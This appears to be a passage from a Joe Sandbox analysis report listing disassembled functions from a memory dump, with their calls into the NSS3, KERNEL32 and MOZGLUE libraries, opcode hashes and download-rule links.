Part of subcall function 6C728F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C729073
Part of subcall function 6C728F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C729111

PR_GetCurrentThread.NSS3 ref: 6C72C8B2

Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C72C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C72C8EB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 8cf7a123c2c24a775f9d3eb52dde40f131029ea4c975d7f6187f459a3e42508c
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 1A010C76E012117BF70029B65E88AFF3668DF6525DF044135FD08A6B01F76DC81883E2

Function 6C754900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C73C79F,?,?,6C755C4A,?), ref: 6C754950

Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,6C76085A,00000000,?,6C708369,?), ref: 6C758821
Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,?,6C76085A,00000000,?,6C708369,?), ref: 6C75883D
Part of subcall function 6C758800: EnterCriticalSection.KERNEL32(?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758856
Part of subcall function 6C758800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C758887
Part of subcall function 6C758800: PR_Unlock.NSS3(?,?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758899

TlsGetValue.KERNEL32(?,?,?), ref: 6C75496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C754989

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 8ba12e1188dfe808b05d27069e1f423a09b3100fa7a7ac2298f4069ee38ee919
Instruction ID: b73fbd15c45f6047ef16a633be8e20bb1938871d243c0ebd6bd110f58e24ede5
Opcode Fuzzy Hash: 8ba12e1188dfe808b05d27069e1f423a09b3100fa7a7ac2298f4069ee38ee919
Instruction Fuzzy Hash: AA1138F1A002019BEB105F29DE0A9667BB8FF0636CB940175E94987B12EF21E834D7D5

Function 6C78EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EE14

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

memcpy.VCRUNTIME140(?,?,6C779767,00000000,00000000,6C777FFA,?,6C779767,?,8B7874C0,0000A48E), ref: 6C78EE33

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 307b2515c24e0f6e5fda417f9a252fcfa79e843dda94b6118d426df7954a2383
Instruction ID: db914df18878d17a925468915af33035c92bf50382e587545648c8004a9dad8a
Opcode Fuzzy Hash: 307b2515c24e0f6e5fda417f9a252fcfa79e843dda94b6118d426df7954a2383
Instruction Fuzzy Hash: F611A3B9A0270AABE7109E65DE88B46B3ACEF0435DF244535EA1982A41E331E464C7F1

Function 6C7708D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C7709B3,0000001A,?), ref: 6C7708E9

Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7708FD

Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C770939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C770953

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 7b25922ea1e647a2d55bf0d2f97ad427a8d281171ed501e10b32c5acb4e2ba33
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 6E01C4B1A0164F6BFF249A369E14B677B98AF40218F104439EC1AC6B41EB22E4148EB4

Function 6C7549C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,6C76085A,00000000,?,6C708369,?), ref: 6C758821
Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,?,6C76085A,00000000,?,6C708369,?), ref: 6C75883D
Part of subcall function 6C758800: EnterCriticalSection.KERNEL32(?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758856
Part of subcall function 6C758800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C758887
Part of subcall function 6C758800: PR_Unlock.NSS3(?,?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758899

PR_SetError.NSS3 ref: 6C754A10
TlsGetValue.KERNEL32(6C74781D,?,6C73BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C754A24
EnterCriticalSection.KERNEL32(?,?,?,6C73BD28,00CD52E8), ref: 6C754A39
PR_Unlock.NSS3(?,?,?,?,6C73BD28,00CD52E8), ref: 6C754A4E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 86e9611db00e989178bd5838986c2a8e119ea169656dc0bdc1ffdb78e2b82c30
Instruction ID: a8d35c00f53b18c8dfa4bb0ee50c48852f539a276d333e24406d2dadf989c4a4
Opcode Fuzzy Hash: 86e9611db00e989178bd5838986c2a8e119ea169656dc0bdc1ffdb78e2b82c30
Instruction Fuzzy Hash: A1216AB8A046018FDB10AF79C28956ABBF4FF45358F41497DD8858BB01EB34E864CBC5

Function 6C728DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C728DE7
EnterCriticalSection.KERNEL32 ref: 6C728DFC
PR_Unlock.NSS3 ref: 6C728E2D
PR_SetError.NSS3 ref: 6C728E49

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 690c944e4a5f46a12a54af20af089b4b9354acea23077e491a1e4986f9c86f69
Instruction ID: 7d049509fb2f03670024e6b8c76b64ba47981acb61e7e66fbc8ef69b7bd0db38
Opcode Fuzzy Hash: 690c944e4a5f46a12a54af20af089b4b9354acea23077e491a1e4986f9c86f69
Instruction Fuzzy Hash: F2118C75A05A119FD740AF78C5881AABBF4FF09718F01496ADC8897B01E738E894CBC2

Function 6C7AAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C795F17,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C795F17,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AACDB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 355a38cc2d5007a6b1b42fe29750a507eb8cd9a53574023d6ea0680cb764b673
Instruction ID: dddb0bd592c1e017789004502491cd4c7a11969aa689376409f6949ff5b5572c
Opcode Fuzzy Hash: 355a38cc2d5007a6b1b42fe29750a507eb8cd9a53574023d6ea0680cb764b673
Instruction Fuzzy Hash: FE015EB5601B01ABE7A0DF69DA08753B7E8BF04669B504939E85AC3E00E735F055CFD1

Function 6C711D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C711D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C711D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C711D9C
free.MOZGLUE(00000000), ref: 6C711DB8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 0ef2fb386726250696bae3a46c08997f05da2ef7b4e49e484b7d8bc3cd53ff9e
Instruction ID: 7122b7585fc5d74c4dd185de005e5b396e0110d283506177720ac61629f9e657
Opcode Fuzzy Hash: 0ef2fb386726250696bae3a46c08997f05da2ef7b4e49e484b7d8bc3cd53ff9e
Instruction Fuzzy Hash: 23F049B261961057FB105E5A9E47B8736489BA1798F190335DD888FF40D760E404C2E5

Function 6C7588E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6C7608AA,?), ref: 6C7588F6
EnterCriticalSection.KERNEL32(?,?,?,?,6C7608AA,?), ref: 6C75890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7608AA,?), ref: 6C758936
PR_Unlock.NSS3(?,?,?,?,?,6C7608AA,?), ref: 6C758940

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: 6bc0112024b6998bddebc0bfd359412853ed4d13b3fc20c17e51c25a21711a8b
Instruction ID: c608283a96d6089efa0c344f623cb546403592a11d476ba3349deec23f893310
Opcode Fuzzy Hash: 6bc0112024b6998bddebc0bfd359412853ed4d13b3fc20c17e51c25a21711a8b
Instruction Fuzzy Hash: 940184B4A046059BD700AF39C184655BBF4FF05358F450A3AD89887B01EB30E4A5CBC2

Function 6C790840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C862F88,6C790660,00000020,00000000,?,?,6C792C3D,?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C790860

Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C792C3D,?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C790874
EnterCriticalSection.KERNEL32(00000001), ref: 6C790884
PR_Unlock.NSS3 ref: 6C7908A3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 7265887700c0747909c0a56405cb31afb6632d4d6f2b08f4e4a8aaa8c9e154d8
Instruction ID: 06114da0ab5fe05e72f08430be90cba2e32da4272d0f2eef331282e4bd7ca345
Opcode Fuzzy Hash: 7265887700c0747909c0a56405cb31afb6632d4d6f2b08f4e4a8aaa8c9e154d8
Instruction Fuzzy Hash: E6012B76F102446BEB212B2BFD49D657738EB5B31DF0805B1EC1856A02EB259454CBE1

Function 6C81CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C81CC61
free.MOZGLUE ref: 6C81CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C81CC80
free.MOZGLUE(?), ref: 6C81CC87

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: bd922545a47d3610b102a669188b6c9648e0c4e57139a97c94e69bb9a23f43bd
Instruction ID: 4405696c95788373b973b4aa5366219c2e96f894a17002240ccce743ce4b989a
Opcode Fuzzy Hash: bd922545a47d3610b102a669188b6c9648e0c4e57139a97c94e69bb9a23f43bd
Instruction Fuzzy Hash: 65E030B6B00608ABCA50EFA9DC4488677ACEE4D2747150535E691C3701D235F905CFE1

Function 6C754D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C754D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C754DE6

Strings

%d.%d, xrefs: 6C754DDE

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 6cf5cc70364a5d75e99ae517bcb7fd98d46a23d79f44b19745aad4c3ab856e34
Instruction ID: 2a6d8963d7f2373c784b8bde6866584dc06519c56ebc567939a956425d12ccc3
Opcode Fuzzy Hash: 6cf5cc70364a5d75e99ae517bcb7fd98d46a23d79f44b19745aad4c3ab856e34
Instruction Fuzzy Hash: A2310CB2D003186BEB109BA19D0ABFF7768EF40308F440429ED1957781EF349929CBE1

Function 6C7F0900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6C7F0917
sqlite3_value_text.NSS3(?), ref: 6C7F0923

Part of subcall function 6C6B13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C682352,?,00000000,?,?), ref: 6C6B1413
Part of subcall function 6C6B13C0: memcpy.VCRUNTIME140(00000000,R#hl,00000002,?,?,?,?,6C682352,?,00000000,?,?), ref: 6C6B14C0

Strings

error in %s %s%s%s: %s, xrefs: 6C7F0944

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: aaf3bf710747ce3d1c3022d62a8054277a91547cc738cc317a7cd809becb3f95
Instruction ID: 01a6d27e50f22ba47944ea2833f1f4bfef1fe6b3e6156775b8f86354dbfcfb94
Opcode Fuzzy Hash: aaf3bf710747ce3d1c3022d62a8054277a91547cc738cc317a7cd809becb3f95
Instruction Fuzzy Hash: 7E0125B6E001095BEB009A58EC019BABBB5EFD1218F144428ED585B701FB329D2583A6

Function 6C774CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8wl,00000000,00000000,?,?,6C773827,?,00000000), ref: 6C774D0A

Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C774D22

Part of subcall function 6C75FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C701A3E,00000048,00000054), ref: 6C75FD56

Strings

'8wl, xrefs: 6C774D07

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8wl
API String ID: 1521942269-312688369
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 54630a2ea6ac97f87f981392ceb2be07dd9eb62f141903e670ff369d3e8cb4ee
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: FAF06232601229A7EF204D6EAF85B4336DC9B4167DF1402B1EE68CB781E621CC049AB1

Function 6C79AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C79AF78

Part of subcall function 6C6FACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6FACE2
Part of subcall function 6C6FACC0: malloc.MOZGLUE(00000001), ref: 6C6FACEC
Part of subcall function 6C6FACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6FAD02
Part of subcall function 6C6FACC0: TlsGetValue.KERNEL32 ref: 6C6FAD3C
Part of subcall function 6C6FACC0: calloc.MOZGLUE(00000001,?), ref: 6C6FAD8C
Part of subcall function 6C6FACC0: PR_Unlock.NSS3 ref: 6C6FADC0
Part of subcall function 6C6FACC0: PR_Unlock.NSS3 ref: 6C6FAE8C
Part of subcall function 6C6FACC0: free.MOZGLUE(?), ref: 6C6FAEAB

memcpy.VCRUNTIME140(6C863084,6C8602AC,00000090), ref: 6C79AF94

Strings

SSL, xrefs: 6C79AF73

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
